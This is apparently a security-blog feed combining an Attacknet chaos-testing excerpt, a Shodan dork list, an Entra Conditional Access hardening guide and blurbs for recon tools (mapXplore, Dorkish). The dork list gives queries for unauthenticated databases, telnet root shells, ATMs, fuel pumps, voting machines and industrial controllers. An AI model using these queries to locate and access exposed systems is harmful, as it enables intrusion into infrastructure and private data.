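    },
}

config.load_kube_config()
client.CustomObjectsApi().create_namespaced_custom_object(
    group="chaos-mesh.org",
    version="v1alpha1",
    namespace="devnet",
    plural="timechaos",
    body=time_chaos,
)
```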

Once the fault concludes, Attacknet performs a battery of health checks against each node in the network to verify that they were able to recover from the fault. If all nodes recover from the fault, Attacknet moves on to the next configured fault. If one or more nodes fail health checks, Attacknet will generate an artifact of logs and test information to allow debugging.

Future work

In this first release, Attacknet supports two run modes: one with a manually configured network topology and fault parameters, and a “planner mode” where a range of faults are run against a specific client with loosely defined topology parameters. In the future, we plan on adding an “Exploration mode” that will dynamically define fault parameters, inject them, and monitor network health repeatedly, similar to a fuzzer.

Attacknet is currently being used to test the Dencun hard fork, and is being regularly updated to improve coverage, performance, and debugging UX. However, Attacknet is not an Ethereum-specific tool, and was designed to be modular and easily extended to support other types of chains with drastically different designs and topologies. In the future, we plan on extending Attacknet to target other chains, including other types of blockchain systems such as L2s.

If you’re interested in integrating Attacknet with your chain/L2’s testing process, please contact us.

Shodan Dorks

By: Zion3R
18 March 2024 at 11:30


Shodan Dorks by twitter.com/lothos612

Feel free to make suggestions


Shodan Dorks

Basic Shodan Filters

city:

Find devices in a particular city. city:"Bangalore"

country:

Find devices in a particular country. country:"IN"

geo:

Find devices by giving geographical coordinates. geo:"56.913055,118.250862"

Location

country:us country:ru country:de city:chicago

hostname:

Find devices matching the hostname. server: "gws" hostname:"google" hostname:example.com -hostname:subdomain.example.com hostname:example.com,example.org

net:

Find devices based on an IP address or /x CIDR. net:210.214.0.0/16
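
All of the filters in this list can also be combined and used programmatically. A minimal sketch with the official shodan Python library; the API key is a placeholder:

```python
import shodan

api = shodan.Shodan("<YOUR_API_KEY>")

try:
    # Any dork from this list works as a query string
    results = api.search('product:MySQL port:3306 country:"IN"')
    print(f"Results found: {results['total']}")
    for match in results["matches"][:10]:
        print(match["ip_str"], match.get("org", "n/a"))
except shodan.APIError as exc:
    print(f"Error: {exc}")
```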

Organization

org:microsoft org:"United States Department"

Autonomous System Number (ASN)

asn:ASxxxx

os:

Find devices based on operating system. os:"windows 7"

port:

Find devices based on open ports. proftpd port:21

before/after:

Find devices seen before or after a given date. apache after:22/02/2009 before:14/3/2010

SSL/TLS Certificates

Self-signed certificates ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com

Expired certificates ssl.cert.expired:true


Device Type

device:firewall device:router device:wap device:webcam device:media device:"broadband router" device:pbx device:printer device:switch device:storage device:specialized device:phone device:"voip" device:"voip phone" device:"voip adaptor" device:"load balancer" device:"print server" device:terminal device:remote device:telecom device:power device:proxy device:pda device:bridge

Operating System

os:"windows 7" os:"windows server 2012" os:"linux 3.x"

Product

product:apache product:nginx product:android product:chromecast

Customer Premises Equipment (CPE)

cpe:apple cpe:microsoft cpe:nginx cpe:cisco

Server

server: nginx server: apache server: microsoft server: cisco-ios

ssh fingerprints

dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0

Web

Pulse Secure

http.html:/dana-na

PEM Certificates

http.title:"Index of /" http.html:".pem"

Tor / Dark Web sites

onion-location

Databases

MySQL

"product:MySQL" mysql port:"3306"

MongoDB

"product:MongoDB" mongodb port:27017

Fully open MongoDBs

"MongoDB Server Information { "metrics":" "Set-Cookie: mongo-express=" "200 OK" "MongoDB Server Information" port:27017 -authentication

Kibana dashboards without authentication

kibana content-length:217

elastic

port:9200 json port:"9200" all:elastic port:"9200" all:"elastic indices"

Memcached

"product:Memcached"

CouchDB

"product:CouchDB" port:"5984"+Server: "CouchDB/2.1.0"

PostgreSQL

"port:5432 PostgreSQL"

Riak

"port:8087 Riak"

Redis

"product:Redis"

Cassandra

"product:Cassandra"

Industrial Control Systems

Samsung Electronic Billboards

"Server: Prismview Player"

Gas Station Pump Controllers

"in-tank inventory" port:10001

Fuel Pumps connected to internet:

No auth required to access CLI terminal. "privileged command" GET

Automatic License Plate Readers

P372 "ANPR enabled"

Traffic Light Controllers / Red Light Cameras

mikrotik streetlight

Voting Machines in the United States

"voter system serial" country:US

Open ATM:

May allow for ATM access. NCR Port:"161"

Telcos Running Cisco Lawful Intercept Wiretaps

"Cisco IOS" "ADVIPSERVICESK9_LI-M"

Prison Pay Phones

"[2J[H Encartele Confidential"

Tesla PowerPack Charging Status

http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

Electric Vehicle Chargers

"Server: gSOAP/2.8" "Content-Length: 583"

Maritime Satellites

Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!

"Cobham SATCOM" OR ("Sailor" "VSAT")

Submarine Mission Control Dashboards

title:"Slocum Fleet Mission Control"

CAREL PlantVisor Refrigeration Units

"Server: CarelDataServer" "200 Document follows"

Nordex Wind Turbine Farms

http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"

C4 Max Commercial Vehicle GPS Trackers

"[1m[35mWelcome on console"

DICOM Medical X-Ray Machines

Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.

"DICOM Server Response" port:104

GaugeTech Electricity Meters

"Server: EIG Embedded Web Server" "200 Document follows"

Siemens Industrial Automation

"Siemens, SIMATIC" port:161

Siemens HVAC Controllers

"Server: Microsoft-WinCE" "Content-Length: 12581"

Door / Lock Access Controllers

"HID VertX" port:4070

Railroad Management

"log off" "select the appropriate"

XZERES Wind Turbine

title:"xzeres wind"

PIPS Automated License Plate Reader

"html:"PIPS Technology ALPR Processors""

Modbus

"port:502"

Niagara Fox

"port:1911,4911 product:Niagara"

GE-SRTP

"port:18245,18246 product:"general electric""

MELSEC-Q

"port:5006,5007 product:mitsubishi"

CODESYS

"port:2455 operating system"

S7

"port:102"

BACnet

"port:47808"

HART-IP

"port:5094 hart-ip"

Omron FINS

"port:9600 response code"

IEC 60870-5-104

"port:2404 asdu address"

DNP3

"port:20000 source address"

EtherNet/IP

"port:44818"

PCWorx

"port:1962 PLC"

Crimson v3.0

"port:789 product:"Red Lion Controls"

ProConOS

"port:20547 PLC"

Remote Desktop

Unprotected VNC

"authentication disabled" port:5900,5901 "authentication disabled" "RFB 003.008"

Windows RDP

99.99% are secured by a secondary Windows login screen.

"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"

C2 Infrastructure

CobaltStrike Servers

product:"cobalt strike team server" product:"Cobalt Strike Beacon" ssl.cert.serial:146473198 - default certificate serial number ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1 ssl:foren.zik

Brute Ratel

http.html_hash:-1957161625 product:"Brute Ratel C4"

Covenant

ssl:"Covenant" http.component:"Blazor"

Metasploit

ssl:"MetasploitSelfSignedCA"

Network Infrastructure

Hacked routers:

Routers that have been compromised. hacked-router-help-sos

Redis open instances

product:"Redis key-value store"

Citrix:

Find Citrix Gateway. title:"citrix gateway"

Weave Scope Dashboards

Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.

title:"Weave Scope" http.favicon.hash:567176827

Jenkins CI

"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"

Jenkins:

Jenkins Unrestricted Dashboard x-jenkins 200

Docker APIs

"Docker Containers:" port:2375

Docker Private Registries

"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab

Pi-hole Open DNS Servers

"dnsmasq-pi-hole" "Recursion: enabled"

DNS Servers with recursion

"port: 53" Recursion: Enabled

Already Logged-In as root via Telnet

"root@" port:23 -login -password -name -Session

Telnet Access:

NO password required for telnet access. port:23 console gateway

Polycom video-conference system no-auth shell

"polycom command shell"

NPort serial-to-eth / MoCA devices without password

nport -keyin port:23

Android Root Bridges

A tangential result of Google's sloppy fractured update approach. 🙄 More information here.

"Android Debug Bridge" "Device" port:5555

Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords

Lantronix password port:30718 -secured

Citrix Virtual Apps

"Citrix Applications:" port:1604

Cisco Smart Install

Vulnerable (kind of "by design," but especially when exposed).

"smart install client active"

PBX IP Phone Gateways

PBX "gateway console" -password port:23

Polycom Video Conferencing

http.title:"- Polycom" "Server: lighttpd" "Polycom Command Shell" -failed port:23

Telnet Configuration:

"Polycom Command Shell" -failed port:23

Example: Polycom Video Conferencing

Bomgar Help Desk Portal

"Server: Bomgar" "200 OK"

Intel Active Management CVE-2017-5689

"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995 "Active Management Technology"

HP iLO 4 CVE-2017-12542

HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900

Lantronix ethernet adapter's admin interface without password

"Press Enter for Setup Mode port:9999"

Wifi Passwords:

Helps to find the cleartext wifi passwords in Shodan. html:"def_wirelesspassword"

Misconfigured Wordpress Sites:

The wp-config.php if accessed can give out the database credentials. http.html:"* The wp-config.php creation script uses this file"

Outlook Web Access:

Exchange 2007

"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"

Exchange 2010

"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392

Exchange 2013 / 2016

"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"

Lync / Skype for Business

"X-MS-Server-Fqdn"

Network Attached Storage (NAS)

SMB (Samba) File Shares

Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.

"Authentication: disabled" port:445

Specifically domain controllers:

"Authentication: disabled" NETLOGON SYSVOL -unix port:445

Concerning default network shares of QuickBooks files:

"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445

FTP Servers with Anonymous Login

"220" "230 Login successful." port:21

Iomega / LenovoEMC NAS Drives

"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"

Buffalo TeraStation NAS Drives

Redirecting sencha port:9000

Logitech Media Servers

"Server: Logitech Media Server" "200 OK"

Example: Logitech Media Servers

Plex Media Servers

"X-Plex-Protocol" "200 OK" port:32400

Tautulli / PlexPy Dashboards

"CherryPy/5.1.0" "/home"

Home router attached USB

"IPC$ all storage devices"

Webcams

Generic camera search

title:camera

Webcams with screenshots

webcam has_screenshot:true

D-Link webcams

"d-Link Internet Camera, 200 OK"

Hipcam

"Hipcam RealServer/V1.0"

Yawcams

"Server: yawcam" "Mime-Type: text/html"

webcamXP/webcam7

("webcam 7" OR "webcamXP") http.component:"mootools" -401

Android IP Webcam Server

"Server: IP Webcam Server" "200 OK"

Security DVRs

html:"DVR_H264 ActiveX"

Surveillance Cams:

With username admin and password :P. NETSurveillance uc-httpd Server: uc-httpd 1.0.0

Printers & Copiers:

HP Printers

"Serial Number:" "Built:" "Server: HP HTTP"

Xerox Copiers/Printers

ssl:"Xerox Generic Root"

Epson Printers

"SERVER: EPSON_Linux UPnP" "200 OK"

"Server: EPSON-HTTP" "200 OK"

Canon Printers

"Server: KS_HTTP" "200 OK"

"Server: CANON HTTP Server"

Home Devices

Yamaha Stereos

"Server: AV_Receiver" "HTTP/1.1 406"

Apple AirPlay Receivers

Apple TVs, HomePods, etc.

"\x08_airplay" port:5353

Chromecasts / Smart TVs

"Chromecast:" port:8008

Crestron Smart Home Controllers

"Model: PYNG-HUB"

Random Stuff

Calibre libraries

"Server: calibre" http.status:200 http.title:calibre

OctoPrint 3D Printer Controllers

title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944

Ethereum Miners

"ETH - Total speed"

Apache Directory Listings

Substitute .pem with any extension or a filename like phpinfo.php.

http.title:"Index of /" http.html:".pem"

Too Many Minecraft Servers

"Minecraft Server" "protocol 340" port:25565

Literally Everything in North Korea

net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24



Top things that you might not be doing (yet) in Entra Conditional Access – Advanced Edition

18 March 2024 at 08:00

Introduction

In the first post of this series on top things that you might not be doing (yet) in Entra Conditional Access, we focused on basic but essential security controls that I recommend checking out if you have not implemented them already. In this second part, we’ll go over more advanced security controls within Conditional Access that, in my experience, are frequently overlooked during security assessments. They can help you better safeguard your identities.

Similar to my previous blog post, the list of controls provided here is not exhaustive, and the relevance of each control may vary depending on your specific environment. You should not rely on these controls alone; instead, investigate whether they would bring value to your environment. I also encourage you to check out the other Conditional Access controls available to make sure your identities are correctly protected.

This article focuses on features that are available with Entra ID Premium P1 and P2 licenses. If neither of those licenses is available, check my previous blog post on how to protect identities in Entra ID Free: https://blog.nviso.eu/2023/05/02/enforce-zero-trust-in-microsoft-365-part-1-setting-the-basics/. Note that other licenses could also be required depending on the control.

Additionally, should you need any introduction to what Entra Conditional Access is and which security controls are available, feel free to have a look at this post: https://blog.nviso.eu/2023/05/24/enforce-zero-trust-in-microsoft-365-part-3-introduction-to-conditional-access/.

Finally, if you have missed part 1, feel free to check it out: https://blog.nviso.eu/2024/02/27/top-things-that-you-might-not-be-doing-yet-in-entra-conditional-access/.

Entra Conditional Access security controls

Make sure all Operating Systems are covered in your current Conditional Access design

License requirement: Entra ID Premium P1

When performing Entra Conditional Access assessments, we usually see policies that enforce controls on Windows, and sometimes on Android and iOS devices. However, other platforms such as macOS, Windows Phone, and Linux are sometimes forgotten. This can represent a significant gap in your overall security defense, as access from those platforms is not restricted by default. You could use all the Conditional Access policy features, but if these platforms are not covered, all your effort will be in vain.

Indeed, attackers are well aware that “nonstandard” platforms are sometimes forgotten in Conditional Access. By trying to access your environment through them, they might be able to simply bypass your Conditional Access (CA) policies. It is therefore necessary to make sure that your security controls are applied across all operating systems.

The next points will shed some light on controls that you can implement to support all platforms.

Don’t be afraid of blocking access, but only in a considered and reasonable way 🙂

License requirement: Entra ID Premium P1

Based on our numerous assessments over the years, we have observed that ‘Block’ policies are typically not implemented in Conditional Access. While those policies can definitely have an adverse impact on your organization and end users, specific actions, device platforms, or client applications (see part 1) should be blocked.

For example, if you do not support Linux in your environment, why not simply block it? Moreover, if Linux is only required for some users, Conditional Access allows you to be very granular by targeting users, devices, locations, etc. Therefore, platforms can be blocked for most use cases, and you can still allow specific flows based on your requirements. This principle can be extended to (guest) user access to applications. Should guest users have access to all your applications? No? Then, block it. Such control effectively decreases the overall attack surface of your environment.

Example: Conditional Access policy to block access to all cloud applications from Linux.
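
Expressed as a Microsoft Graph conditionalAccessPolicy document, such a block policy might look like the sketch below. This is illustrative only: the excluded object ID is a placeholder, and the policy starts in report-only mode.

```python
# Could be created via POST /identity/conditionalAccess/policies
block_linux_policy = {
    "displayName": "BLOCK - Access from Linux",
    "state": "enabledForReportingButNotEnforced",  # report-only while testing
    "conditions": {
        "users": {
            "includeUsers": ["All"],
            # Always exclude break-the-glass accounts
            "excludeUsers": ["<break-glass-account-object-id>"],
        },
        "applications": {"includeApplications": ["All"]},
        "platforms": {"includePlatforms": ["linux"]},
    },
    "grantControls": {"operator": "OR", "builtInControls": ["block"]},
}
```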

I highly recommend giving some thought to ‘Block’ policies. Moreover, they can be extended to many other scenarios beyond device platforms and (guest) user access to cloud apps.

Before moving on to the next point, I want to highlight that such policies can be very powerful. So powerful that they could lock you out of your own environment. To avoid that, please always exclude emergency / break-the-glass accounts. In addition, never roll out Conditional Access policies in production without proper testing. The report-only policy mode can be of great help for that. The What If tool is also very useful for assessing the correctness of your policies. Once the potential impact and the policy configuration have been carefully reviewed, gradually roll out policies in waves over a period of a few weeks with different pilot groups.

Use App Protection Policies to reduce the risk of mobile devices

License requirement: Entra ID Premium P1 and Microsoft Intune

If access from mobile devices, i.e., Android and iOS, is required for end user productivity, App Protection Policies (APPs) can help you prevent data loss on devices that you may not fully manage. Note that App Protection Policies are now also available for Windows devices but are still in preview at the time of writing (beginning of March 2024).

In short, App Protection Policies are a set of rules that ensure data accessed through mobile apps is secure and managed appropriately, even on personal devices. APPs can enforce the use of Microsoft-managed applications, such as Microsoft apps, enforce data encryption, require authentication, restrict actions between managed and unmanaged applications, wipe the data from managed applications, etc.

For that purpose, the following Grant control can be configured:

Example: Enforce App Protection Policies in Conditional Access.

Of course, to be effective, App Protection Policies should be created in Intune and assigned to users. Because of that, Microsoft Intune licenses are required for users in scope of that control.

Moreover, together with the Exchange Online and SharePoint Online app enforced restrictions capabilities, you can allow, restrict, or block access from third-party browsers on unmanaged devices.

Require Authentication Strengths instead of standard multi-factor authentication

License requirement: Entra ID Premium P1

Authentication Strength policies in Entra ID Conditional Access enable administrators to mandate certain authentication methods, such as FIDO2 Security Keys, Windows Hello, Microsoft Authenticator, and passwordless authentication. Please note that the authentication methods available to users will be determined by either the new authentication method policies or the legacy MFA policy.

By configuring Authentication Strengths policies and integrating them in Conditional Access policies, you can further restrict (external) user access to sensitive applications or content in your organization. Built-in policies are also available by default:

Authentication strengths policies in Entra ID.
Built-in authentication strengths policies in Entra ID.

One common use case for Authentication Strength policies is to ensure that user accounts with privileged access are protected by requiring phishing-resistant MFA authentication, thus restricting access to authorized users only. In Conditional Access, this goal can be achieved through multiple methods:

  1. Secure Privileged Identity Management role activation with Conditional Access policies (see next point for more details);
  2. Include privileged Entra ID roles in Conditional Access, by selecting directory roles in the policy assignments;
  3. Integrate protected actions into Conditional Access policies to enforce step-up authentication when users perform specific privileged and high-impact actions (see next point for more details).

Other use cases include enforcing stricter authentication requirements when connecting from outside a trusted location, when a user is flagged with a risk in Identity Protection, or when accessing sensitive documents in SharePoint Online.

Finally, as mentioned above, external users (only those authenticating with Microsoft Entra ID, at the time of writing) can be required to satisfy Authentication Strengths policies. The behavior will depend on the status of the cross-tenant access settings, as explained in my previous blog post.

Use Authentication Context to protect specific actions and applications

License requirement: Entra ID Premium P1

Authentication Contexts in Conditional Access allow you to extend the locations or actions covered by Conditional Access policies. Indeed, they can be associated with applications, SharePoint Online sites or documents, or even specific privileged and high-impact actions in Entra ID.

Before diving into how they can be used, let’s quickly go over how they are created. Authentication Contexts are a feature of Microsoft Entra Conditional Access and can therefore be managed from the Conditional Access service. Before they can be used, they need to be created and published to applications:

Add an authentication context in Microsoft Entra Conditional Access.
Add an authentication context in Microsoft Entra Conditional Access.

Once they have been created and published, we can use them in Conditional Access policies. Let’s take a closer look at the different scenarios described above:

  1. Integrate Authentication Contexts in Sensitivity Labels to require step-up authentication or enforce restrictions when accessing sensitive content:

In this first example, the Super-Secret sensitivity label has been configured to require step-up authentication when accessing documents with that label assigned:

Enforce step-up authentication in Sensitivity Labels.
Enforce step-up authentication in Sensitivity Labels.

If we configure the below CA policy with the target resource set to the ‘Sensitive documents’ Authentication Context, users will have to satisfy the phishing-resistant MFA requirement when accessing documents labeled with the Super-Secret label, unless it has already been satisfied during sign-in:

Conditional Access policy to require phishing-resistant MFA when accessing sensitive documents (i.e., documents labeled as Super-Secret in our example).
Example: Conditional Access policy to require phishing-resistant MFA when accessing sensitive documents (i.e., documents labeled as Super-Secret in our example).
  2. Integrate Authentication Context with Privileged Identity Management roles to enforce additional restrictions on role activation (PIM requires Entra Premium P2 licenses):

Role settings in Entra Privileged Identity Management can be changed to require an Authentication Context on role activation. That way, administrators can ensure that highly privileged roles are protected against abuse and only available to authorized users:

PIM role setting to require Microsoft Entra Conditional Access authentication context on activation.
PIM role setting to require Microsoft Entra Conditional Access authentication context on activation.

When such control is configured in PIM, users will not be prompted to perform MFA twice if the specified MFA requirement has been previously met during the sign-in process. On the other hand, they will be prompted with MFA if it hasn’t been met before.

Similar to the previous point, the same principle applies to the creation of the Conditional Access policy. The custom PIM Authentication Context should be set as the target resource, and the conditions and access controls configured to meet your security requirements.

Important note: when changing the configuration of highly privileged roles, which allow modifying the configuration of Microsoft Entra PIM itself, make sure you are not locking yourself out of the environment by keeping at least one active assignment configured.

  3. Integrate Entra ID Protected Actions with Conditional Access policies:

Finally, by integrating Entra ID Protected Actions with Conditional Access, administrators can introduce an extra layer of security when users attempt specific actions, such as modifying Conditional Access policies. Once again, make sure you are not locking yourself out here.

With Protected Actions, you can require strong authentication, enforce a shorter session timeout or filter for specific devices. To create a Protected Action, administrators first need to create an Authentication Context, which will then be assigned to a set of actions in the ‘Entra ID Roles and administrators’-page:

Link protected actions in Entra ID to authentication context.
Link Protected Actions in Entra ID to Authentication Context.

In this example, the ‘Protected Actions’ Authentication Context has been linked to permissions that allow updating, creating, and deleting Entra Conditional Access policies.

Then, in a Conditional Access policy, set the target resource to the ‘Protected Actions’ Authentication Context and define the conditions as well as the access controls.

Once in effect, administrators will be required to meet the configured authentication requirements and/or conditions each time they attempt to modify Conditional Access policies:

Step-up authentication when performing an Entra ID protected action.
Step-up authentication required when performing an Entra ID protected action.

Use Device Filters in Conditional Access policies conditions

License requirement: Entra ID Premium P1

Last but not least, the ‘Filter for devices’-condition in Entra Conditional Access is a powerful tool that can be used for multiple purposes. Indeed, by using this condition, it is possible to target specific devices based on their ID, name, ownership, compliance or join state, model, operating system, custom attributes, etc.

Besides the common scenarios of using the device filter condition to target compliant, non-compliant, registered, or joined devices, it can be used to restrict or block access based on more advanced conditions. For instance, you might require that only devices with certain operating system versions, specific device IDs, or device names that follow a particular pattern are allowed to access specific applications. Custom attributes can also be useful for more granularity, if needed.

The following filter targets devices meeting all of these criteria:

  • The display name of the device should contain ‘ADM’;
  • The device should be marked as compliant (in Microsoft Intune, for instance);
  • The device state should be Microsoft Entra joined;
  • And ExtensionAttribute4 should contain ‘anyvalue’. Extension Attributes for Entra ID registered devices can be added and customized using the Microsoft Graph REST API (a minimal sketch follows below).
Device filter condition in Entra Conditional Access policies.
Example: Device filter condition in Entra Conditional Access policies.
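As a side note, here is a minimal sketch of how such an extension attribute could be set through the Microsoft Graph REST API (the device object ID is a placeholder, and the caller is assumed to hold the required directory permissions):

PATCH https://graph.microsoft.com/v1.0/devices/{device-object-id}
Content-Type: application/json

{
  "extensionAttributes": {
    "extensionAttribute4": "anyvalue"
  }
}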

More information about the different operators and properties can be found in the ‘Resources’-section below.

Bonus: Restrict authentication flows

License requirement: Entra ID Premium P1

The ability to restrict authentication flows in Microsoft Entra Conditional Access, which is still in preview, was introduced at the end of February 2024 (while I was writing this blog post). I included it to make sure that you are aware of this new feature. However, I do not recommend implementing it in production before it is released in General Availability (at least not without proper investigation and testing!).

This functionality has been introduced as a new condition in Microsoft Entra Conditional Access policies and allows administrators to restrict device code flow and authentication transfer.

Firstly, the device code flow has been introduced to facilitate user sign-in on input-constrained devices, referred to as ‘device A.’ With this flow, users can authenticate on ‘device A’ by using a secondary device, referred to as ‘device B.’ They do this by visiting the URL: https://login.microsoftonline.com/common/oauth2/deviceauth. Once the user successfully signs in on ‘device B,’ ‘device A’ will receive the necessary access and refresh tokens.

The flow can be represented as follows:

Device code flow authentication.
Device code flow authentication.

However, this functionality has been, and still is, abused by attackers attempting to trick users into entering the device code and their credentials.

Therefore, Conditional Access policies can now be used to block device code flow, or restrict it to managed devices only. This measure helps ensure that phishing attempts are unlikely to succeed unless the attackers possess a managed device.

Conditional Access policy to block the use of device code flow.
Example: Conditional Access policy to block the use of device code flow.

Moreover, device code flow authentication attempts are visible in the Entra ID Sign-in Logs:

Device code flow authentication attempt.
Device code flow authentication attempt.
Identify device code flow sign-in activities with KQL.
Identify device code flow sign-in activities with KQL.
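For reference, a minimal KQL sketch along these lines (assuming the SigninLogs table is available in Log Analytics or Microsoft Sentinel) could look like:

SigninLogs
| where AuthenticationProtocol == "deviceCode"
| project TimeGenerated, UserPrincipalName, AppDisplayName, IPAddress, ResultType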

Secondly, authentication transfer enables users to transfer their authenticated state from one device to another, for instance, by scanning a QR code with their mobile phone from a desktop application. This functionality reduces the number of times users have to authenticate across different platforms. However, it also means that users aren’t required to perform MFA again on their mobile phone if they have already performed MFA on their laptop.

Like device code flow authentication, authentication transfer can be blocked using a Conditional Access policy. To do so, simply select ‘Authentication transfer’ under Transfer methods.

Finally, authentication transfer can also be detected in the Entra ID Sign-in logs. Indeed, ‘QR code’ is set as the authentication method in the authentication details.

Evaluate Conditional Access policies

License requirement: Entra ID Premium P1

As a final note, I wanted to highlight the What If tool in Entra Conditional Access. It allows administrators to understand the result of the CA policies in their environment. For that purpose, administrators can select target users, applications, any available conditions, etc., to make sure that existing CA policies have the expected behavior. It also helps troubleshoot the configuration by giving visibility into the policies that apply to users under specific conditions. The What If tool can be accessed in Entra ID > Conditional Access > Policies:

What if tool in Entra Conditional Access.
What if tool in Entra Conditional Access.

Moreover, the DCToolbox PowerShell module, an amazing toolbox for various Microsoft 365 security tasks developed by Daniel Chronlund, also allows you to evaluate your current Conditional Access policies against a specific scenario. For that purpose, you can use the Invoke-DCConditionalAccessSimulation function: the tool will fetch all existing CA policies and evaluate them against the scenario that you have provided as arguments. You can find the DCToolbox PowerShell module on GitHub: https://github.com/DanielChronlund/DCToolbox.
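As a minimal sketch, a simulation could be started as follows (the parameter shown is an assumption for illustration; check Get-Help Invoke-DCConditionalAccessSimulation for the actual options):

# Install the module from the PowerShell Gallery
Install-Module DCToolbox -Scope CurrentUser
# Simulate policy evaluation for a given user (illustrative parameter)
Invoke-DCConditionalAccessSimulation -UserPrincipalName 'user@example.com'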

I highly recommend using one of these tools to evaluate your newly created or existing Conditional Access policies. Also note that proper testing and validation, with different pilot phases and progressive rollouts, are essential to avoid impacting end users when creating new policies.

Finally, as a general best practice, Conditional Access policies, and potential exceptions, should be properly documented. For that purpose, the DCToolbox tool allows you to export the current configuration of your Conditional Access policies in an Excel file, for example.

Conclusion

In this second blog post about Entra Conditional Access settings and configurations, we went over important principles that might help you increase the overall security posture of your environment. As with the first part, the settings and configuration items that I have highlighted could be considered when designing or reviewing your Entra Conditional Access implementation. This list is non-exhaustive and is based on my experience reviewing and implementing Conditional Access policies in different environments. Also, it is important to rigorously evaluate any policies before rolling them out in production and to make sure that other controls have also been properly configured in your cloud environment. Conditional Access policies are a great way to safeguard your identities and critical resources, but they are not the only layer of defense that you should be relying on.

At NVISO, we have built an expertise reviewing cloud environments and have designed and implemented Entra Conditional Access on numerous occasions. If you want to know more about how we can help you in the journey of building or strengthening your Conditional Access setup, among others, feel free to connect on LinkedIn or visit our website at https://www.nviso.eu.

Resources

You can contact me on LinkedIn should you have any questions or remarks. My contact details can be found below.

Additionally, if you want to get a deeper understanding of some of the topics discussed in the blog post, all the resources that I have used can be found below:

About the author

Guillaume Bossiroy

Guillaume Bossiroy

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Entra ID Conditional Access policies to deploying Microsoft 365 Defender security products.

Additionally, Guillaume is also interested in DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

Route to Safety: Navigating Router Pitfalls

18 March 2024 at 00:00
Introduction
Wi-Fi routers have always been an attractive target for attackers. When taken over, an attacker may gain access to a victim’s internal network or sensitive data. Additionally, there has been an ongoing trend of attackers continually incorporating new router exploits into their arsenal for use in botnets, such as the Mirai Botnet. Consumer-grade devices are especially attractive to attackers due to the many security flaws in them. Devices with lower security often contain multiple bugs that attackers can exploit easily, rendering them vulnerable targets.

Exploitation of a kernel pool overflow from a restrictive chunk size (CVE-2021-31969)

24 November 2023 at 00:00
Introduction
The prevalence of memory corruption bugs persists, posing an ongoing challenge for exploitation. This increased difficulty arises from advancements in defensive mechanisms and the escalating complexity of software systems. While a basic proof of concept often suffices for bug patching, the development of a functional exploit capable of bypassing existing countermeasures provides valuable insights into the capabilities of advanced threat actors. This holds particularly true for the scrutinized driver, cldflt.

mapXplore - Allow Exporting The Information Downloaded With Sqlmap To A Relational Database Like Postgres And Sqlite

By: Zion3R
17 March 2024 at 11:30


mapXplore is a modular application that imports data extracted by sqlmap into a PostgreSQL or SQLite database.

Its main features are:

  • Import of information extracted from sqlmap to PostgreSQL or SQLite for subsequent querying.
  • Sanitizes information: at the time of import, it decodes or transforms unreadable information into a readable form.
  • Search for information in all tables, such as passwords, users, and desired information.
  • Automatic export of information stored in base64, such as:

    • Word, Excel, PowerPoint files
    • .zip files
    • Text files or plain text information
    • Images
  • Filter tables and columns by criteria.

  • Filter by different types of hash functions without requiring prior conversion.
  • Export relevant information to Excel or HTML

Installation

Requirements

  • python-3.11
git clone https://github.com/daniel2005d/mapXplore
cd mapXplore
pip install -r requirements.txt

Usage

It is a modular application, and consists of the following:

  • config: It is responsible for configuration, such as the database engine to use, import paths, among others.
  • import: It is responsible for importing and processing the information extracted from sqlmap.
  • query: It is the main module capable of filtering and extracting the required information.
    • Filter by tables
    • Filter by columns
    • Filter by one or more words
    • Filter by one or more hash functions within which are:
      • MD5
      • SHA1
      • SHA256
      • SHA3
      • ....

Beginning

Allows loading a default configuration at the start of the program

python engine.py [--config config.json]

Modules



Dorkish - Chrome Extension Tool For OSINT & Recon

By: Zion3R
16 March 2024 at 11:30


During the reconnaissance phase or when doing OSINT, we often use Google dorking and Shodan, and thus the idea of Dorkish was born.
Dorkish is a Chrome extension tool that facilitates custom dork creation for Google and Shodan using the builder and it offers prebuilt dorks for efficient reconnaissance and OSINT engagement.


Installation And Setup

1- Clone the repository

git clone https://github.com/yousseflahouifi/dorkish.git

2- Go to chrome://extensions/ and enable the Developer mode in the top right corner.
3- Click on the Load unpacked button and select the dorkish folder.

Note: For Firefox users, you can find the extension here: https://addons.mozilla.org/en-US/firefox/addon/dorkish/

Features

Google dorking

  • Builder with keywords to filter your Google search results.
  • Prebuilt dorks for bug bounty programs.
  • Prebuilt dorks used during the reconnaissance phase in bug bounty.
  • Prebuilt dorks for exposed files and directories.
  • Prebuilt dorks for login and sign-up portals.
  • Prebuilt dorks for cybersecurity jobs.

Shodan dorking

  • Builder with filter keywords used in Shodan.
  • Variety of prebuilt dorks to find IoT, network infrastructure, cameras, ICS, databases, etc.

Usage

Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.
